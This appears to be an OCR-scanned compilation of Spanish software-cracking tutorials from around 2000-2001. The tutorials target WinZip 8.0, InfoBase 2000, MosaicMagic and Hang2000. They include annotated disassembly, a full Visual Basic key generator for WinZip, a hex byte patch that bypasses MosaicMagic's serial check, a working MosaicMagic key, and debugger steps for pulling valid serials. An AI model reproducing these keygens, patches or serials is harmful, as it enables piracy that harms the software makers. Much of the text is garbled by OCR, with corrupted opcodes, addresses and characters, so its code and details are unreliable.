:00407ce9 0O15dfe add [ebp-04], ebx suttia la 2 partedel 
registration+ 

:00407cec 8a5601 mov dl, [esi+01] ¡siguiente caracter 

:00407cef 47 inc edi ¿contador = contador +1 

:00407cf0 46 inc esi ¡puntero = puntero + 1 

:00407cf1 ebe9 jmp 00407cde ¡“for x=1 to len(name) 


:00407cf3 c705ecd3470001000000 mov dword ptr [0047d3ec], 00000001 


mov esi, ecx 
mov cl, [ecx] 
test cl, cl 

37 00407dle 
MOVZX Cx, cl 
push 00001021 
push ecx 

push eax 


call 00407d3f ¡opera con el caracter actual 


mov cl, [esi+01] 


add esp, 0c 
inc esi 


0fb74dfc movzx ecx, dword ptr [ebp-04] 


add eax, 63 
push ecx 
MOVZX €ax, ax 


push eax 


* possible stringdate ref form data obj -> '%04x %04x" 


:00407cfd Sbfl 
:00407cff 8a09 
:00407d01 84c9 
:00407d03 7419 
:00407d05 660fb6c9 
:00407d09 6821100000 
:00407d0e 51 
:00407d0f 50 
:00407d10 e82a2000000 
:00407d15 8a4de01 
:00407d18 3c40c 
:00407d1b 46 
:00407d1e 

:00407d22 83c063 
:00407d25 51 
:00407d26 0fb7c0 
:00407d29 50 
:00407d2a 6884144600 
:00407d2f ff750c 
:00407d32 e869e20400 
:00407d37 83c410 
:00407d3a Sf 
:00407d3b 5e 
:00407d3c 5b 
:00407d3d c9 
:00407d3e c3 
:00407d1c ebe3 


* referenced by a call at addresses: 


|:00407b8b, :00407c75 
| 

:00407d3f 55 
:00407d40 Sbec 
:00407d42 8b4508 
:00407d45 56 
:00407d46 33c9 
:00407d48 6408 
:00407d4a Sa6d0c 
:00407d4d 5a 
:00407d4e Sbf1 
:00407d50 330 


push 00461484 


push dword ptr [ebp+0c] 


call 00455fa0 
add esp, 10 


pop edi 


pop esi 
pop ebx 


leave 


ret 
jmp 00407401 


(w32dasm893) 


push ebp 

mov ebp, esp 

mov eax, [ebp+08] 
push esi 

XOr ecx, ecx 

push 08 

mov ch, [ebp+0c] 
pop edx 

mov esi, ecx 


xor esi, eax 


¿copia puntero del name 
¡coge 1” caracter 

stestea si es 0 

¿salta a 407dle si lo es 
¡extiende cl a cx 

¿vuelca 1021h y 

sel caracter actual a la pila 
sy eax (la 1” vezeax=0) 


stoma el siguiente caracter de la 
string$ 


¡ajusta puntero de la pila 
¡puntero = puntero + 1 
4 ultimos dig. registration+ 


¿suma 63 a los 4 primeros dig. 
registration+ 


¿vuelca a la pila 


¡extiende los 4 primeros dig. 
registration+ a eax 


¿vuelca eax 


sfunción de concatenación 


;y guardalos como string$ 


slong. máxima $ en hex. 


ssi la 1* parte de registration+ 
tiene más de 4 


¡caract., estos prevaleceran 
sobre la 2” 


¡parte de registration+ de la 
¿cual se suprimiran por izgda. 


¿pasando a los de la 1*? parte del 
registration+ 


sretorna a la call 


¿salta hacia arriba 


:00407d52 66£7c60080 test si, 8000 
:00407d57 7407 Jz 00407460 


como podéis observar la rútina de generación del registrationt es bastante larga, y aquí no está escrita totalmente (el 
resto del traceo lo podéis probar vosotros)). encontrareis que el winzip nos genera otro registration*, a través de la 
función 00407d3f, en mi caso es : 


name : +erOser'2000[for the new millennium] <- name en minúsculas. 
registration+t: 33951299 


codificación key generator en visual basic | 


' nombre: keygenerator winzip 8.0 (3105) 
' autor: +erOser'2000 [for the new millennium] 
' creado: miercoles, noviembre 22,2000 E 12:25:22 pm (vers: 1.0.0000) 
' descripcion: winzip 8.0 (3105) 
private sub textl_change() 
text2.text = registration_key(textl.text) 
end sub 


private function registration_key(byval name as string) as string 
dim partel!, parte2!, c!, x!, n! 
dim keyparte1$, keyparte2$ 
name = trim$(name) 'quitamos blancos 
name = mid$(name, 1, 40) 'restringimos a 40 caracteres 
if len(name) = 0 then 
exit function 
end if 


'registration* se compone de 2 partes, ambas de 4 valores hexadecimales 
Donna HT? parte Henmomnmmnmann - 
for x = 1 to len(name) 

c = asc(mid$(name, x, 1)) 

c=c* £h100 


for n = 1 to 8 'S veces por cada carácter 
if (((c xor partel) mod <h10000) and £<h8000) = 0 then 
'diferencias entre winzip 8.0 £ winzip 7.0 
"winzip 7.0 --> ffffffff = -1 (byte order "intel” dec.) bit 1 izquierda 
"winzip 8.0 --> Saffffff = -166 (byte order "intel" dec.) 
partel = partel and «h5Safffff 
partel = partel * 2 
else 
partel = partel and «h5Safffff 
partel = partel * 2 
'xorea con el número mágico «<h6666 :)) lo teneis que encontar vosotros 
partel = partel xor £h6666 
end if 
ec=c*2 
next n 
next x 


"sumamos h63 a los 4 primeros digitos registration* 
partel = partel + £h63 
partel = partel mod £<h10000 
le mmm 22 parte Henmmmmmmmnmen - 
for x = 1 to len(name) 
parte2 = parte2 + asc(mid$(name, x, 1)) * (x - 1) 
next x 
'concatenamos las 2 partes (cada parte es de 4 digitos) 
keypartel= string$(4 - len(cstr(hex(partel))), ''0'") + cstr(hex(partel)) 
keyparte2= string$(4 - len(cstr(hex(parte2))), ''0") + cstr(hex(parte2)) 
registration_key = keypartel + keyparte2 
end function 


(no disponibles,el webmaster de la pagina no pone cracks) 


kgwinzip80.exe - key generator winzip 8.0 (3105) 


kgwinzip.exe - key generator winzip 7.0-8.0 (3105) 


fácil, nooo ;)! espero haberme explicado bien. 


om ++ agradecimientos +f----- - 
karpoff, demian, black fenix, prOfesor x, numit_or, esiel 2, mr. crimson, mr. white, mr. green, tnt, wkt, kut y a todos los 
crackers del pasado, presente y futuro. 
idad dE resetea Henao - 


un saludo! 


+erOser'2000 
for the new millennium 


-=/W- your mind is the power -/WV=- 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


FEO geamas InfoBase 2000 v 1.0 


introducción 


hola amigos, de nuevo por aqui con otro tutorial mas, en el cual hablaremos de como encontrar un numero de 
serie para todos!!! jejeje !!! los programas de la empresa " bitlogic " los cuales vienen muy mal protegidos, ya 


sistema de protección, que viene a hechar a perder todo el programa, ya que si este es bueno, y la protección 
mala, !!!! que desperdicio de tiempo !!!! 


este programa que ocuparemos de ejemplo es de muy buena utilidad para todos aquellos: 


que necesitan un programa para almacenar todas sus citas, en un archivo con un format rich text, esta 
aplicación te permite avisarte de alguna cita que tengas con nueve tipos de alarmas, tambien tiene tres 
tipos de protecciones, y la opcion de encriptarlas para así prevenir que ojos no deseados vean sus citas 
y notas. 


en fin este es un pograma que le puede ayudar a organizarse un poco, con una minima configuración. 


analizamos el ejecutable con el file inspector y veamos la imagen y nos aparece que esta empaketado con aspack v 
1.02b, ok ya sabemos como esta todo este menjurgue !!!jejejej!!!!!.. 


hile msPEctor v3.5 - VIPERIK-FoR] 


o 


ahora analizemos el programa para ver que limitaciones tiene, al abrirlo lo primero que aparece es una ventana como 
esta: 


InfoBase 2000 


Version 1.0 


Development and Design by 
¡TEE Communications (c) 2000 


Ema Reecomébbitlogic co uk 


en la cual podemos ver que tiene dos opciones, una de activate y otra continue, de las cuales la de activate, si damos 
click, nos manda a otra ventana en la cual instertaremos un numero de serie falso para ver que nos da como resultado 
dando click en ok!: 


Activate Licence 


¡Warming 


como siempre, nos manda un mensaje de error, !!!! contact itee comunications blabla....... 


is 


ok!! ya vimos que esta protegido con aspack y 1.02b, y que se registra por medio de un serial, bueno entonces, como 


lo primero será ejecutar el programa otra vez y despues insertar un numero de serie fictisio como se muestra en 
la imagen de arriba, ya estando insertado el numero, damos control d y saltamos a nuestro querido y gran 
ponderado softice!!! en el cual pondremos el mas afamado y util de los breakpoints el bpx hmemcpy y volvemos 
a dar control d e inmediatamente damos click en el boton de ok!, saltaremos al softice y despues de ahi empieza 
la acción, busquemos el serial, tecleamos en la función 12 ''f12", hasta que lleguemos a esta parte del codigo que 
serian mas o menos 12 veces 


osos 
0050b2f7 e8d4bd f4ff call 00457000 < caemos aqui> 
S0b2fc 8b45 f8 mov eax,[ebp-08] 

50b2ff ba08b45000 mov edx,D0S50b400 

50b304 es3b8ceff call 0040344 


50b309 7417 jz 0050b322 


| AO: | 


recuerden que es muy importante, si te gusta el programa compralo !!!!, ya que ' hacen un gran esfuerzo los 
programadores '' para poner a disposicion de todos nosotros estos programas que hacen la vida mas facil, 


saludos a: 
e act mago 


e txeli (consuegro) :) 
e dek_oin 


saludos a todos ustedes que leen mis manuales. recuerden, no acepto pedidos de cracks!!!. 


nos vemos en el próximo tutorial amigos!, 


enjoy!!! 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre ingenieria inversa y 
programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 
Programa: | MosaicMagic | 


Cracker: AlamBike 01/ 01/2001 


introducción 


bien, este es un tutorial para los que, como yo, estamos un poco pez en el asunto pero sin embargo le hechamos 
un poco de vidilla y nos ponemos a trastear con las herramientas. 


para empezar decir que la dificultad es afrontable para todo el mundo y pronto vereis que esto del crack es 
directamente proporcional a las ganas de trabajo de los programadores, y en este caso se ve que el progamador 
tenia otras cosas más importantes que hacer. ;))) 


descargamos esta utilidad que sirve para que a partir de una foto, compare los rasgos y colores con un monton de fotos en 
una galeria dando como resultado una foto que se parece mucho a la primera pero realizada con la union de muchas fotos 
elegidas al azar de la galeria. 


buff menudo rollo, espero que sus abreis enterado, con lo que procederemos al ler paso. 


instalamos el programa y nos damos cuenta de que el progamador ha bloqueado el poder salvar y alguna que otra cosilla, 


con lo que buscamos una ventana de registro, cosa que aparece en la opcion help + register mosaic magic. 


comprobamos, no sin cierta sorna, que nos pide un unico serial, no una ventana con nombre y otra con n*serie, lo que nos 
lleva a pensar que la cosa es sencilla y seguramente exista un serial para todos ( o que este este formado por una 
combinacion fija, que no dependa de variables externas ). 


bueno pues ponemos algo como por ejemplo "kalimocho", y obtenemos un mensaje (con sonido y todo) de una ventana que 
nos dice algo asi como "you have not enterred the correct registation key". 


con esta información en la mano procederemos ... 


Vale , tenemos un programa, que pide un unico campo de serial y además nos aparece una ventana con un texto especifico 
al fallar en el registro. 


cargamos el w32dsm abrimos el fichero mosaicmagic.exe y una vez desensamblado de pulsamos sobrestr-ref, para buscar 
la "frase", como todas las frases que aparecen lo hacen por orden alfabético iremos al final de la ventana de frases y ... ahi 
esta "you have not enterred the correct"... ummm carnaza lista... veamos a donde nos lleva ... 


aparece el siguiente codigo 


* possible stringdata ref from data obj ->"key 1" 


| 
:0040845c 6834034700 push 00470234 
:00408461 68c0884700 push 004788c0 


* reference to: mfc42.mfc42:noname0167, 
ord: 1903h 


| 

:00408466 e8c93e0400 call 0044c334 
:0040846b 8bce mov ecx, esi 
:0040846d e88e000000 call 00408500 
:00408472 85c0 test eax, eax 
:00408474 6a00 push 00000000 
:00408476 6a00 push 00000000 
:00408478 7407 je 00408481 


* possible stringdata ref from data obj - 
>"thankyou for registerring mosaic " 
->"magic" 


| 
:0040847a 680c0a4700 push 00470a0c 
:0040847f eb05 jmp 00408486 


* referenced by a (u)nconditional or (c)onditional 
jump at address: 
|:00408478(c) 


-aparecemos aqui->> * possible stringdata ref 
from data obj ->"you have not enterred the 
correct " 

->"registration key." 


| 
:00408481 68d8094700 push 004709d8 


* referenced by a (u)nconditional or (c)onditional 
jump at address: 

|:0040847f(u) 

| 


* reference to: mfc42.mfc42: noname0012, 
ord: 04b0h 


| 
:00408486 e81f3b0400 call 0044bfaa 


tachan... caimos de lleno, unas líneas mas arriba nos dice "thankyou for registerring moscaic", pero si nos da las gracias y 
todo..., veamos que hace antes... tenemos un test eax, eax y si somos malos pues nos dan berzas, con lo que si miramos un 
poco la rutina de comprobacion... , para ello nos pondremos sobre :0040846d e88e000000 call 00408500y pulsamos sobre el 
boton call para caer en el siguiente codigo. 


* referenced by a call at addresses: 

|:0040840b , :0040846d , :00409020 , :004099f2 
, :0040b046 

| <-- interesante llama a esto desde 5 sitios, 
señores estamos en la rutina de chequeo de 
clave... 


:00408500 642100000000 mov eax, dword ptr 
fs:[00000000] 

:00408506 6aff push TF 

:00408508 6878d54400 push 0044d578 
:0040850d 50 push eax 

:0040850e 64892500000000 mov dword ptr 
fs:[00000000], esp 

:00408515 83ec54 sub esp, 00000054 
:00408518 80442400 lea eax, dword ptr [esp] 
:0040851c 56 push esi 

:0040851d 57 push edi 

:0040851e 6200 push 00000000 


* possible stringdata ref from data obj ->"key 1" 


| 

:00408520 6834024700 push 00470334 
:00408525 68c0884700 push 004788c0 
:0040852a 50 push eax 


* reference to: mfc42.mfc42: noname0168, 
ord: Odc2h 


| 

:0040852b e80a3e0400 call 0044c33a 
:00408530 8b742408 mov esi, dword ptr 
[esp+08] 

:00408534 8b56f8 mov edx, dword ptr [esi-08] 
:00408537 83fa14 cmp edx, 00000014 <-- 
compara la longitud de lo que metemos con 14 
(20 en decimal) la clave tiene 20 caracteres. 
:0040853a 7424 je 00408560 


unas líneas mas abajo 


:004085af C7442464fffFfFFff mov [esp+641, FEF 


* reference to: mfc42.ordinal: 0320, ord:0320h 


| 

:004085b7 e84a380400 call 0044be06 
:004085bc 8b4c245c mov ecx, dword ptr 
[esp+5c] 

:004085C0 5f pop edi 

:004085c1 b801000000 mov eax, 00000001 <<-- 
todo ok ;) mueve 1 a eax y termina... 
:004085c6 5e pop esi 

:004085c7 6489000000000 mov dword ptr 
fs:[00000000], ecx 

:004085ce 83c460 add esp, 00000060 


:004085d1 c3 ret 


y si cambiaramos la linea :0040853a 7424 je 00408560 por jmp 004085b7 :? 


como no estoy muy versado en ensamblador, y no se como codificar la instrucción, pues lo que hago es arrancar el propio 
depurador del w32dasm 
para ello voy a la opcion debug + load process y despues load, con lo que se abren varias ventanas. 


nos vamos a la linea :0040853a 7424 je 00408560 en la ventana del listado muerto y pulsamos f2 para poner un break 
point y corremos el programa en el boton f9-run. 


se abre una nueva ventana que es el programa a destripar, elegimos registrarnos y aparecemos en el codigo de breakpoint... 


bueno ahora le damos al boton patch code y se abre una ventana que pone w32dasm code patcher, aparece la linea del. y 
abajo una caja de dialogo que nos invita a poer el codigo a cambiar , con lo que raudos pondremos jmp 004085b7 y al 
darle al enter, nos aparece el codigo parcheado que es eb7b 


eso es lo que hay que sustituir, 
:0040853a 7424 je 00408560 
por 
:0040853a eb7b jmp 004085b7 


con un editor hexadecimal buscaremos la cadena 83fa14 7424 8d4c2408 y la sustituimos por 83fa14 eb7b 8d4c2408 y 
tendremos el programa funcionando al 100%. 


22 aprox. estudio del código y creación de un n2 
valido 


bueno, como en realidad no me ha llevado mucho tiempo destriparlo, pues pienso que lo interesante esta vez es la obtencion 
por nuestros propios medios de un n£ de serial valido y funcional,de esa forma ademas de aprender algo sobre como 
funciona el asembler, nos distinguiremos con la maxima del cracker que es dejar los ficheros sin alterar.. 


antes de entrar a saco en el codigo, me gustaria llegar al meollo usando otra de las herramientas que un cracker debe tener 
a mano y es el trw2000, en realidad me gusta mucho mas usar este programa que sice puesto que no tienes que configurar 
nada, y lo usas solo cuando quieres sin necesidad de reiniciar el equipo. 


además a los crackers les gustara dos de las nuevas instrucciones que incorpora y que mejoran mucho el analisis del 
programa-victima y son pmodule y suspend. 


bueno, pmodule es una maravilla siempre que el programa llame a otra ventana, en vez de buscar el handle y despues poner 
un breakpoint en el mismo, pmodule hace todo eso por nosotros, en realidad parará en el momento de volver a la ventana 
principal, y suspend lo que hace es parar la ejecucion del programa, dandonos libertad de movimiento pudiendo usar 
cualquier otro programa de windows para por ejemplo, buscar informacion, consultar manuales etc... 


como muestra un boton, cargamos el trw2000 y arrastramos el icono del mosaicmagic al campo que nos pide el fichero a 
cargar, le damos load y f5 para que se ejecute. 


acto seguido nos intentamos registrar y cuando pide el codigo le damos al control+n y aparecemos en la pantalla del 
trw2000, ponemos pmodule y enter, se cierra la pantalla y volvemos a la ventana de registro, una vez introducido un serial 
invalido por ejemplo "hola", tachan!! aparecemos en la rutina de comprobacion (a que es facil de esta forma ;))) ), bien 
estudiemos pues el codigo... 


* referenced by a call at addresses: 

|:0040840b , :0040846d , :00409020 , :004099f2 , :0040b046 
|->esto nos indica desde que puntos llama a la rutina 
:00408500 642100000000 mov eax, dword ptr fs:[00000000] 
:00408506 6aff push TF 


:00408508 6878d54400 push 0044d578 

:0040850d 50 push eax 

:0040850e 64892500000000 mov dword ptr fs:[00000000], esp 
:00408515 83ec54 sub esp, 00000054 

:00408518 80442400 lea eax, dword ptr [esp] 

:0040851c 56 push esi 

:0040851d 57 push edi 

:0040851e 6200 push 00000000 


* possible stringdata ref from data obj ->"key 1" 


| 

:00408520 6834024700 push 00470334 
:00408525 68c0884700 push 004'788c0 
:0040852a 50 push eax 


* reference to: mfc42.ordinal:Odc2, ord:Odc2h 


| 

:0040852b e80a3e0400 call 0044c33a 

:00408530 8b742408 mov esi, dword ptr [esp+08] 
:00408534 8b56f8 mov edx, dword ptr [esi-08] 
:00408537 83fa14 cmp edx, 00000014 

:0040853a 74724 je 00408560 


*** hasta este punto basicamente comprueba la longitud de los caracteres y si 
es igual a 14 (20 en decimal) nos manda a 00408560 si no continuamos en las 
siguiente lineas por si somos chicos malos 
AS 

* referenced by a (u)nconditional or (c)onditional jump at address: 
|:00408520(c) 


| 
:0040853c 8d4c2408 lea ecx, dword ptr [esp+08] 
:00408540 C7442464*fffffff mov [esp+64], TF 


* reference to: mfc42.ordinal:0320, ord:0320h 
| 
:00408548 e8b9380400 call 0044be06 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:0040853a(u) 


| 

:0040854d 5f pop edi 

:0040854e 33c0 xor eax, eax 

:00408550 5e pop esi 

:00408551 8b4c2454 mov ecx, dword ptr [esp+54] 

:00408555 64890d00000000 mov dword ptr fs:[00000000], ecx 
:0040855c 830460 add esp, 00000060 

:0040855f c3 ret 


ES 


:00408560 53 push ebx 

:00408561 33c0 xor eax, eax 

:00408563 8d4c2410 lea ecx, dword ptr [esp+10] 
:00408567 bf14000000 mov edi, 00000014 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:00408570(c) 


| 
:0040856c Ofbe1c30 movsx ebx, byte ptr [eax+esi] 
¡¡¡ importante, mueve el contenido del caracter que apunta eax+esi a ebx pero 
con signo!!! 
esto quiere decir que si eax+esi = 31 en ebx guarda 00000031 
pero si eax+esi = 80 en ebx guarda ffFF8O 


:00408570 40 inc eax 

:00408571 8919 mov dword ptr [ecx], ebx 
:00408573 3bc2 cmp eax, edx 

:00408575 7c02 jl 00408579 

:00408577 33c0 xor eax, eax 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:00408575(c) 


| 

:00408579 83c104 add ecx, 00000004 
:0040857c 4f dec edi 

:0040857d 75ed jne 0040856c 

:0040857f 33c9 xor ecx, ecx 

:00408581 8d742410 lea esi, dword ptr [esp+10] 
:00408585 5b pop ebx 


el bloque de arriba lo que hace es pasar los caracteres que le mandamos por la 
caja de dialogo que estan en la posicion que apunta eax y los transporta a otra 
zona de la memoria apuntada por esp, pero aqui lo que hace es moverlos con 
signo, esto es importante puesto que la rutina comprobara si el numero tenia o 
no signo... (si esta entre 80 y ff ) (128-255 en decimal, esto es que los 
caracteres menores de 128 en codigo ascii seran rechazados...) 


el bloque de abajo en realidad es el meollo de toda la rutina de comprobacion, 
asi que lo describire lo mejor que pueda... 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:004085a9(c) 


| 

:00408586 8bc1 mov eax, ecx 

:00408588 bf05000000 mov edi, 00000005 

:0040858d 99 cdq 

:0040858e f7ff idiv edi 

esto guardará en edx el resto de dividir el valor entre 5 que será un numero 
correlativo del O al 4 


:00408590 8b06 mov eax, dword ptr [esi] 
mueve a eax uno de los caracteres de la clave que hemos puesto 


:00408592 2bc2 sub eax, edx 
le resta a eax (el caracter) el valor del resto que sera correlativa 0-1-2-3-4-0-1-2- 
3-4... 


:00408594 2503000080 and eax, 80000003 

hace la operacion and 80000003 al caracter resultante. 

esto en la practica es que sea cualquier numero que sea solo tiene en cuenta si 
el primer y segundo digito binario es un 1 y si el ultimo digito binario es uno, y 
no le importa que sean los demas, pueden ser unos o ceros que el valor de eax 
tendra O por el medio... 


ejemplo si el caracter es 31 (corresponde con el digito 1 en ascii) 


0000 0000 0000 0000 0000 0000 0011 0001 ->> 31 en hex ->> 49 en 
decimal ->> "1" en ascii 
and 1000 0000 0000 0000 0000 0000 0000 0011 -->> 80000003 


0000 0000 0000 0000 0000 0000 0000 0001 ->> 1 sin signo 
si el caracter por el contrario es 80 


1000 0000 0000 0000 0000 0000 0000 0100 -->> 84 en hex -->>132 
en decimal 
and 1000 0000 0000 0000 0000 0000 0000 0011 -->> 80000003 


1000 0000 0000 0000 0000 0000 0000 0000 -->> 0 pero con signo 


:00408599 7905 ¡ns 00408520 

esto lo que hace es comprobar si el valor resultado del anterior and tiene signo, 
esto es si por lo menos el ultimo digito binario es un 1 si no lo es ... ¡a la 
mierda! que diria d.camilo ;))) 


:0040859b 48 dec eax 
le resta 1 a eax 


:0040859c 83c8fc or eax, fffffffc 
le hace un or fffffffc a eax 
ejemplo si el caracter es (84 -1 ) = 83 


1111 1111 1111 1111 1111 1111 1100 -->> fffffffc en hex 
or 1000 0000 0000 0000 0000 0000 0011 --->> 83 en hex 


1111 1111 1111 1111 1111 1111 1111 --->> ff en hex 


:0040859%f 40 inc eax 
le vuelve a sumar 1 a eax 


* referenced by a (u)nconditional or (c)onditional jump at address: 
|:00408599(c) 


| 
:00408520 759a ¡ne 0040853c 
sino es 0 ¡a la mierda!... 


con estas 4 operaciones lo que hace es comprobar que ademas de signo, el 
numero acabe en xx00 binario 
esto nos da 4 posibilidades 


0000 
->0 
0100 
->4 
1000 
->8 
1100 
->C 


:00408532 41 inc ecx 

:004085a3 83c604 add esi, 00000004 

:00408526 83f914 cmp ecx, 00000014 

:004085a9 7cdb jl 00408586 

repite todo hasta comprobar los 20 caracteres, pero los patrones los hace de 5 
en cinco con lo que si tenemos los 5 primeros bien, solo resta repetirlos 4 veces 
mas ;)) 


:004085ab 8d4c2408 lea ecx, dword ptr [esp+08] 
:004085af C7442464ffffffff mov [esp+641, FF 


* reference to: mfc42.ordinal:0320, ord:0320h 


| 

:004085b7 e84a380400 call 0044be06 

:004085bc 8b4c245c mov ecx, dword ptr [esp+5c] 

:004085C0 5f pop edi 

:004085c1 b801000000 mov eax, 00000001 

:004085c6 5e pop esi 

:004085c7 64890d00000000 mov dword ptr fs:[O0000000], ecx 
:004085ce 83c460 add esp, 00000060 

:004085d1 c3 ret 


lo de arriba es si eres buen chico y todo fue ok hace unas cosas y devuelve 1 a 
eax antes de salir para indicar a la rutina que llamo que todo fue bien. 


una vez entendido el funcionamiento solo nos queda poner caracteres mayores 
que 128 en ascii que coincidan con los criterios, el problema es que windows no 
transforma esos caracteres a su correspondiente ascii si son mayores que 128 


con lo que nos queda probar numeros para ello desbilitamos los demas 
breakpoints con bd * en el trw2000 y ponemos un bpx en 


--> :0040856c Ofbe1c30 movsx ebx, byte ptr [eax+esi] 
con la orden bpx 40856c 


le damos a f5 y cuando nos pida el serial empezamos a poner caracteres con 
alt+129, alt4+-130, alt+-131... alt+148 


bop! aparecemos en trw2000 y al ver eax con d eax salen los numeritos, 
entonces.solo resta hacer un poco de memoria... 


buscamos un numero hex que acabe en 0 4 8 o c y sus 4 numeros siguentes en 
hexa... hummm vemos algo interesante... 


e4 = 132 en ascii 
e5 = 134 en ascii 
e6 = 145 en ascii 
e7 = 135 en ascii 
e8 = 138 en ascii 


ahi esta la cadena !!! 

bueno impacientes, nos vamos a la pantalla de registro y ponemos... 
alt+132 alt+134 alt+145 alt+135 alt+138 

a mi depues de ponerlo me queda en lo siguiente ¿ásecé 


despues selecionamos bloque copiamos y pegamos 4 veces mas para formar la 
clave que es 


ádoeceáareccidreccidrece 


bueno supongo que hay muchos mas caracteres que son validos pero yo encontre estos antes, es cuestion de probar... 


agradezco a los creadores del programa por que nos hacen muy felices a los que nos iniciamos en ser capaces de parchear 
en 5 minutos sus creaciones. 


y comprender sus "complejos" sistemas de proteccion en cosa de hora y media - dos horas 


agradezco a la gente del canal del irc crackers por la ayuda prestada a la hora de explicarme para que servia el cdq, gracias 
seroscuro ;)) 


agradezco a los de k-for por motivarme a escribir el tutorial y dejarme un sitio para publicar el mismo. 


pero sobre todo os agradezco a vosotros el haber perdido el tiempo en la lectura del mismo, 
espero os sirva de algo. si es asi agradeceria que me lo dijerais alambike 


animo a todo el aficionado a intentar elaborar un tutorial y enviarlo, que seguro que sirve de ayuda a mucha gente... 


por ultimo pero no por ello menos importante, es decir que no me hago responsable de lo que la gente haga 
con estos contenidos y que si alguien quiere usar un programa debe pagarlo, lo contrario podria constituir un 
delito. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 


programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 
Hang2000 v1.3.2 


Pr 
Descripción: | Hang2000 es un juego sencillo basado en el clásico juego del ahorcado 


INTRODUCCIÓN 


hola amigos, presento mi décimo octavo tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoGhotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras 
cosas. en este tutorial volveremos a usar el softice. si no lo tienes instalado puedes bajártelo en 
www.crackstore.com . asumo que tienes conocimientos básicos sobre su uso. y para terminar con la intro debo 


decir : este texto ha sido escrito sólo con propósitos educacionales. 


comentario del programa 


vuelve el efecto "ahorcado", pruébalo y seguro que no te decepcionará 


hang2000 es un juego sencillo basado en el clásico juego del ahorcado. recuerda esos momentos de niño en los 
que jugaste tus primeras partidas al ahorcado. un juego que desde el primer momento conseguirá tenerte delante 
del ordenador tenga la edad que tengas. las letras las podrás escoger usando el ratón o el teclado. las palabras 
las podrás seleccionar entre docenas de categorías ya incluidas en el programa. además, podrás añadir tus 
propias palabras, o hasta incluir el vocabulario que has dado ese mismo día en clase, y así poder repasar todo el 
vocabulario. el programa te informará a pequeña escala de aspectos literarios o culturales de las palabras o 
frases que resulten del juego, de esta manera se consigue culturizar al jugador mientras se divierte en el juego. 
hang2000 tiene un interfaz repleto de colores que conseguirá mantener a los niños interesados en el juego. un 
juego educativo al completo con efectos de sonido digitalizados, gráficos no violentos, y mucha diversión por 
descubrir. 


comentario sacado desde softonic. 


lo que nos interesa...el programa es shareware con libre uso de 14 días, por lo que si quieres seguir usándolo 
después de ese periódo deberás pagar la suma de us$20. 


contamos con softice :) ... 


antes de abrir el programa lo analizamos con file inspector v3.5 el que nos mostrará información realmente importante a la 
hora de atacar el programa; bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en microsoft visual c ++5.0 
e no está empacado 


a continuación... cerramos file inspector v3.5 y abrimos hang2000 


abrimos el programa, luego nos vamos a file > register... y nos encontraremos con la caja de registro, la que nos pide los 
siguientes datos: 


name: 
serial 


como hacemos siempre llenamos la caja con cualquier dato, le damos click a register y por supuesto que el programa no 
aceptará el código de registro y nos mostrará un mensaje como este... 


sorry! registraton not accepted. please re-enter the required information exactly as 


received. 


a continuación... cerramos hang2000 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...abrimos hang2000 y vamos directamente a la caja de registro en donde introducimos nuestro nombre, y 
cualquier código de registro. todavía no damos click en register ; lo que ahora debemos hacer es presionar control-+d para 
que salte el softice y así poder colocar nuestro breakpoint. 


ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos f5 para salir del softice. 
ahora le damos click a register y si todo sale bien el bpx debería picar y hace saltar al softice. 


luego presionamos f11 1 vez y f12 8 veces para caer aquí... 


:00406a22 
:00406a26 
:00406a28 
:00406a29 
:00406a2e 
:00406a2f 
:00406a31 
:00406a35 
:00406a3c 
:00406a3d 
:00406a3e 
:00406a43 
:00406a46 
:00406a%a 
:00406a50 


8d54240c 

6ale 

52 

68ed030000 

53 

ffd6 

8d444240c 
8d8c248c000000 
50 

51 

e88d020000 
830408 
66340100 
0f85a7000000 
8d494240c010000 


lea 
push 
push 
push 
push 
Call 
lea 
lea 
push 
push 
Call 
add 
cmp 
jnz 
lea 


edx, [esp+0c] <-- caemos aquí, seguimos con f10 
le 

edx 

000003ed 

ebx 

esi 

eax, [esp+0c] 

ecx, [esp+0000008c] 

eax <-- d eax =nuestro registro falso d ecx =nombre 
ecx <-- lo mismo de arriba 

00406cd0 <-- aquí nos paramos y entramos con f8 


esp, 08 

ax, 0001 

00406a£7 <-- salto bueno, comprobable con r fl z 
edx, [esp+0000010c] 


el salto bueno al que me refiero es el que te manda a registro aceptado obviamente, lo cual puedes comprobar invirtiendo 
el salto con el comando r fl z y luego presionando f5 para ver el resultado. 


luego de presionar f8 en la llamada o call 00406a3e, caeremos aquí... 


:00406cd0 8b4c2404 


:00406cd4 
:00406cda 
:00406cde 
:00406cdf 
:00406ce0 
:00406ce5 
:00406ce8 
:00406ceb 
:00406ced 
:00406cf3 


:00406cf4 
:00406cf£5 
:00406cf6 
:00406cfd 
:00406d01 
:00406d03 


8lec80000000 
84442400 

50 

51 
e8cbfeffff 
83c408 
6685c0 

7507 
81c480000000 
(036) 


53 

56 
8bb42490000000 
84442408 

8al0 

8ale 


sub 
lea 
push 
push 
Call 
add 
test 
jnz 
add 
ret 


push 
push 
mov 
lea 
mov 
mov 


ecx, [esp+04] <- caemos aquí, seguimos con f10 
esp, 00000080 

eax, [esp+00] 

eax 

ecx 

00406bb0 

esp,08 

ax, ax 

00406c£4 <- nos dejamos llevar por este salto 
esp, 00000080 


ebx <-- caemos aquí, seguimos con f10 
esi 

esi, [esp+00000090] 

eax, [esp+08] 

dl, [eax]<-- d eax =registro válido :) 
dl, [esi] 


al colocar d eax en el mov 00406d01 tendremos nuestro código de registro válido, en mi caso la caja quedaría así... 


name: act mago 


serial* Ijbepc-13660 


le damos click a register y... 


nota: 


